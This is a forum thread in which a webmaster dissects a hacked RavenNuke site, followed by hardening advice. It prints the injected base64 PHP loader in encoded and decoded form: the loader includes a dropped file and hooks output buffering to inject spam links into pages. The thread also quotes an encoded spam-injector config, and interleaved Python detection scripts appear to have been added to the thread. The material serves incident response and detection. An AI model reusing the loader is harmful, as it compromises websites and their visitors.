Ravens PHP Scripts: Forums



Joined: Sep 12, 2006
Posts: 58
Location: Dsm, IA

Posted: Thu Sep 03, 2009 6:47 pm

My site was just hacked with a large number of files containing
<?php /**/eval(base64_decode('aWYoZnV ... ')); ?>
at the top. I'll post the whole thing if needed, but decoded it comes out to
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/xxx/public_html/includes/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php')){include_once('/home/xxx/public_html/includes/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return 
gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

Wondering if this is an exploit in the fckeditor or something else? I'm running RN2.30.02, and I make sure I patch everything on the site as it comes. I already contacted my host; just trying to figure out how they got in.
Former Moderator in Good Standing

Joined: Apr 30, 2004
Posts: 3221

Posted: Thu Sep 03, 2009 7:59 pm

Definitely start with your host and see whether you can get access logs to determine how they got in. It does look like FCKEditor could be an issue if it's reading from that directory.

Let us know if you need any help

- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
Site Admin

Joined: Jun 04, 2004
Posts: 6433

Posted: Fri Sep 04, 2009 10:42 am

includes/fckeditor/editor/filemanager/browser/default/images/icons/32 shouldn't be writeable. If that php file is there, it's possible (if not likely) that there are security issues on the server (I've seen something like this happen before with an FTP security issue, and it affected every account on the server).

In the meantime, if you have access to your account logs, check that, but if it's a server issue, you won't find anything there...

I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG

Posted: Fri Sep 04, 2009 1:08 pm

Unfortunately the logs had rolled over, so they couldn't look at the actual attack. I have the raw log from yesterday but haven't seen anything in it yet (lots in there). That directory isn't world writeable; after running a cmd via ssh I only found a few directories that are (used by clan roster, gallery2, vsp stats, open realty, all up to date). I'm going to go through and make sure those actually need to be writeable, but fckeditor wasn't one of them.

I had upgraded to fckeditor which was the newest some time ago, but did find several files in there that shouldn't have been there. One had
ZGdxbg== = "d3VvbQ=="
dHQ= = "Wz5VRl9LRVlXT1JEPF0="
ZGd1cmw= = "aHR0cDovL3BlYXJjaC5uZXQvaW4uY2dpPzE1JnBhcmFtZXRlcj0ka2V5d29yZCZzZT0kc2Umc2VvcmVmPSVyZWYlJkhUVFBfUkVGRVJFUj0lc2VsZl91cmwlJmRlZmF1bHRfa2V5d29yZD0la3cl"
ZGd1aA== = "aHR0cDovL25vbXNhdDI0Lm5ldC87aHR0cDovL25zc2F0NC5jb20vO2h0dHA6Ly93cGxzYXQyNC5uZXQv"
a2Q= = Mg==
cHJs = MA==
c3A= = MzA=
c3Q= = "c3Ryb25nO2VtO2I7aTt1"
bWFya292 = MA==
ZGdibG8= = MQ==
ZnJi = MQ==
bWw= = NTA=
ZGdzcg== = MQ==
ZGdzdA== = MjQ=
ZGdmZA== = MA==
cXI= = "c2lkO3BocHNlc3NpZDtjYWtlcGhwO29zY3NpZDtwaHBraXRzaWQ7eGNpZDtzZXNzaW9uaWQ="
ZnI= = MA==
a3dy = MQ==
dGhlbWU= = ""
There was another that had tons of "spam related" words (blackjack, viagra, xanax, etc.) and another was an swf binary. So at this point I'm guessing they were trying to add links to all the pages for spamming purposes, although I'm still not totally sure how they got in.

I've reverted fckeditor back to the version that came with 2.30.02, although it's a few versions behind, so I don't know if that's a good idea. I did find that the owner had installed an old version of dolphin, which has now been removed, but if they used that I don't understand why they would use the fckeditor directory, as dolphin was on its own in a subdirectory/for a subdomain.

Sorry for the long post. Do you think I should upgrade again to the newest fckeditor, or is the version with RN (2.63) the safer choice at this point?
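As an added example (not code from this thread, and not tooling from the hosted site or from RavenNuke), here is a small Python scanner for the two kinds of artefact described so far: the `eval(base64_decode('...'))` header quoted in the first post, and the base64 `key = value` lines quoted just above. It decodes each encoded eval it finds, lists the function calls that make the decoded blob look like the output-buffer loader from the first post, and pulls out the path of the file it includes. The sample PHP file is constructed here around a harmless stand-in snippet (it is not the payload from the thread, and its include path is shortened), and the sample config is a subset of the lines posted above.

```python
import base64
import re

# Constructed stand-in for the decoded body quoted in the first post: only the
# shape (include of a dropped file, then ob_start with a callback) is kept.
STANDIN_BODY = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){"
    "include_once('/home/xxx/public_html/includes/fckeditor/style.css.php');"
    "ob_start('dgobh');}"
)

# Constructed sample file: the injected header followed by the real page code.
SAMPLE_PHP = (
    "<?php /**/eval(base64_decode('"
    + base64.b64encode(STANDIN_BODY.encode()).decode()
    + "')); ?>\n<?php echo 'legitimate page'; ?>\n"
)

# Subset of the key = value lines quoted in the post above (both sides base64).
SAMPLE_CONFIG = """ZGdxbg== = "d3VvbQ=="
dHQ= = "Wz5VRl9LRVlXT1JEPF0="
a2Q= = Mg==
c3Q= = "c3Ryb25nO2VtO2I7aTt1"
cXI= = "c2lkO3BocHNlc3NpZDtjYWtlcGhwO29zY3NpZDtwaHBraXRzaWQ7eGNpZDtzZXNzaW9uaWQ="
dGhlbWU= = ""
"""

EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)", re.S
)

# Calls that, taken together, mark a decoded blob as an output-hijacking loader
# (hook output buffering, pull in a dropped helper, inflate and rewrite <body>)
# rather than ordinary application code.
FLAGGED = ("ob_start", "include_once", "gzinflate", "gzdecode",
           "preg_replace", "eval", "base64_decode")


def find_encoded_evals(source):
    """Return the decoded text of every eval(base64_decode('...')) in source."""
    out = []
    for m in EVAL_B64.finditer(source):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            out.append(raw.decode("utf-8", "replace"))
        except ValueError:
            out.append("<undecodable: %s...>" % m.group(1)[:16])
    return out


def flagged_calls(decoded):
    """Names from FLAGGED that occur as function calls in the decoded text."""
    return [name for name in FLAGGED if re.search(r"\b%s\s*\(" % name, decoded)]


def included_paths(decoded):
    """Paths handed to include/require in the decoded text: that is where the
    dropped helper file lives and what to pull for analysis."""
    return re.findall(r"(?:include|require)(?:_once)?\s*\(\s*'([^']+)'", decoded)


def scan(source):
    """One report entry per encoded eval found in a file's contents."""
    return [
        {"calls": flagged_calls(d), "includes": included_paths(d), "decoded": d}
        for d in find_encoded_evals(source)
    ]


def decode_pairs(text):
    """Decode lines of the form <b64key> = <b64value> (value optionally quoted)."""
    pairs = {}
    for line in text.splitlines():
        if " = " not in line:
            continue
        key, _, value = line.partition(" = ")
        value = value.strip().strip('"')
        k = base64.b64decode(key.strip()).decode("utf-8", "replace")
        v = base64.b64decode(value).decode("utf-8", "replace") if value else ""
        pairs[k] = v
    return pairs


if __name__ == "__main__":
    for hit in scan(SAMPLE_PHP):
        print("encoded eval found; calls:", hit["calls"], "includes:", hit["includes"])
    for k, v in decode_pairs(SAMPLE_CONFIG).items():
        print("%s = %r" % (k, v))
```

Run it over the contents of each .php file in the web root (the regex is deliberately tolerant of whitespace, since the quoted header used `/**/` as padding); a hit whose decoded body calls `ob_start` and includes a file from an images directory is the pattern from the first post, and the include path tells you which dropped file to pull before cleaning up.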

Posted: Fri Sep 04, 2009 6:41 pm

The upgrade for the latest FCKEditor probably hasn't been tested under RavenNuke. Yes, that could be the way they got in.

kguske is definitely the one to talk to, since he's integrating nukeWYSIWYG (FCKEditor) for RavenNuke.

Posted: Fri Sep 04, 2009 9:34 pm

If you had FCKeditor, that works and is tested with RavenNuke (assuming it is configured correctly). It also contains some additional security features to prevent authorized uploads (if you used the version from nukeSEO or RN 2.3.2). But as I said earlier, this appears to have been done through another means. Even with 2.30, this shouldn't have been possible since even that version had features built in to prevent uploading executable files.

Posted: Fri Sep 04, 2009 10:46 pm

Yes, I had the version from NukeSEO, and I've now upgraded back to it after removing all files. It's weird, because I'm kinda wanting them to do it again; replacing the files isn't really an issue, I can just rsync back from known good files, I just really want to know how specifically they got in. Perhaps it was the dolphin install, but that still bugs me why they'd use the fckeditor directory for all their files.
Site Admin

Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam

Posted: Sat Sep 05, 2009 3:57 pm

They probably used that directory to keep you focused on finding a problem with FCKeditor that doesn't exist.
Spouse Contemplates Divorce

Joined: Jan 02, 2003
Posts: 2496

Posted: Sat Feb 13, 2010 12:01 pm

This is an old topic but worth a bump. An added measure of security is to limit the access (assuming you're on an Apache web server) with .htaccess.


# Add extensions as needed as shown
deny from all
<Files ~ "^\w+\.(gif|jpe?g|png|avi)$">
    order deny,allow
    allow from all
</Files>

This will help to prevent double extension exploits such as php.jpg and will limit access to files with extensions in the array, i.e. images you want people to see! Maybe someone can improve on this, but this is pretty universally accepted to work as it is.
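As an added example that is not part of the post above, the following Python emulates the effect of that `<Files ~ ...>` rule on a constructed set of filenames, using Python's `re` as a stand-in for Apache's regex engine. It goes a little beyond the post by comparing the original pattern with two variants of my own: a looser one that admits dots in the base name (which reopens the double-extension case the post is guarding against) and a hardened one that admits hyphens and upper-case extensions while still denying `shell.php.jpg`. The filenames are constructed for the demonstration.

```python
import re

# The pattern from the .htaccess snippet above: default deny, allow on match.
IMAGE_ONLY = re.compile(r"^\w+\.(gif|jpe?g|png|avi)$")

# Variant (mine, not from the post): letting the base name contain dots makes
# the rule accept a second extension again, which defeats its purpose.
LOOSE = re.compile(r"^[\w.-]+\.(gif|jpe?g|png|avi)$")

# Variant (mine, not from the post): hyphens allowed, extension case-insensitive,
# but still no dot inside the base name, so double extensions stay denied.
HARDENED = re.compile(r"^[\w-]+\.(gif|jpe?g|png|avi)$", re.I)


def decide(filename, pattern=IMAGE_ONLY):
    """Emulate 'deny from all' plus an allow-on-match <Files ~> block:
    'allow' when the basename matches the pattern, otherwise 'deny'."""
    return "allow" if pattern.search(filename) else "deny"


# Constructed sample of names an upload directory might contain.
SAMPLE_NAMES = [
    "photo.jpg",       # plain image
    "banner.jpeg",     # exercises the jpe?g alternation
    "shell.php.jpg",   # double extension: \w+ cannot span the first dot
    "style.css.php",   # the dropped helper named in the first post
    "my-photo.png",    # hyphen is not \w, so the original rule denies it
    "PHOTO.JPG",       # the original rule is case-sensitive
]


def report(names=SAMPLE_NAMES):
    """Verdict of each pattern for each name, keyed by filename."""
    return {
        n: {"original": decide(n, IMAGE_ONLY),
            "loose": decide(n, LOOSE),
            "hardened": decide(n, HARDENED)}
        for n in names
    }


if __name__ == "__main__":
    print("%-16s %-8s %-8s %-8s" % ("name", "original", "loose", "hardened"))
    for name, verdicts in report().items():
        print("%-16s %-8s %-8s %-8s" % (name, verdicts["original"],
                                        verdicts["loose"], verdicts["hardened"]))
```

The point the table makes is that the snippet's strictness is a feature: `\w+` is what keeps `shell.php.jpg` out, so any relaxation should widen the character class (hyphens, case) without readmitting dots. In Apache terms the hardened variant is `<FilesMatch "^[\w-]+\.(?i:gif|jpe?g|png|avi)$">`, since Apache's regex engine supports the inline `(?i:...)` flag.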
RavenNuke(tm) Development Team

Joined: Dec 02, 2006
Posts: 1693
Location: Texas, USA

Posted: Sat Feb 13, 2010 12:17 pm

That's a pretty cool little snippet, thanks!
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours